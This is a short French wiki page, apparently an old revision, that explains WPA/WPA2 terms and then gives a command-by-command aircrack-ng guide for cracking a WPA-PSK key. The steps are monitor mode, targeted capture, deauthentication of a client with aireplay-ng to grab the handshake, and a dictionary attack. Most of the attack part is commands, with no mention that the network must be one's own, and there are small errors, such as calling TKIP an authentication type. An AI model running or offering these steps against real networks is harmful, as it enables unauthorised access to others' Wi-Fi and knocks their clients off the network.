Ceci est une ancienne révision du document !
WPA
Wi-Fi Protected Access (WPA et WPA2) est un mécanisme pour sécuriser les réseaux sans-fil de type Wi-Fi.
Il utilise deux types de d'authentification :
- TKIP (Temporal Key Integrity Protocol) : une clé de 128 bits est utilisée pour chaque paquet. On génère une nouvelle clé pour chaque paquet.
- CCMP : un mécanisme de chiffrement qui s'appuie sur AES et qui est plus robuste que le TKIP.
Vocabulaire utilisé :
- BSSID : est l'adresse mac du point d'accès wifi.
- ESSID : est le nom du reseau wifi (exemple: Bbox-AFXXX)
- Handshake : est un échange de clé entre un routeur wifi et un client.
- Channel : est le canal sur lequel est diffusé le reseau wifi.
Sur les réseaux des particuliers le WPA PSK est utilisé (Preshared key).
Il utilise le TKIP comme authentification.
Pour commencer assurez vous que votre carte wifi supporte le monitoring.
Pour l'activer :
airmon-ng start wlan0
Dans mon cas wlan0 est mon interface wifi.
Nous allons ensuite lister les wifi en WPA :
airodump-ng --encrypt wpa mon0
–encrypt permet de filtrer les réseaux wifi par chiffrement
mon0 est notre interface de monitoring
Pour obtenir un station :
airodump-ng -a -c [chan] --bssid [APmac] -w [outfile][iface]
Dès qu'une station apparait :
aireplay-ng -0 1 -e [ESSID] -a [BSSID] -c [Client MAC] [iface]
augmenter le 1 si ça n'a pas suffit à obtenir un handshake.
Pour vérifier si le handshake est capturé lancer
aircrack-ng outfile.cap
pour le obtenir la clé :
aircrack -w dictionnaire -b [bssid] outfile.cap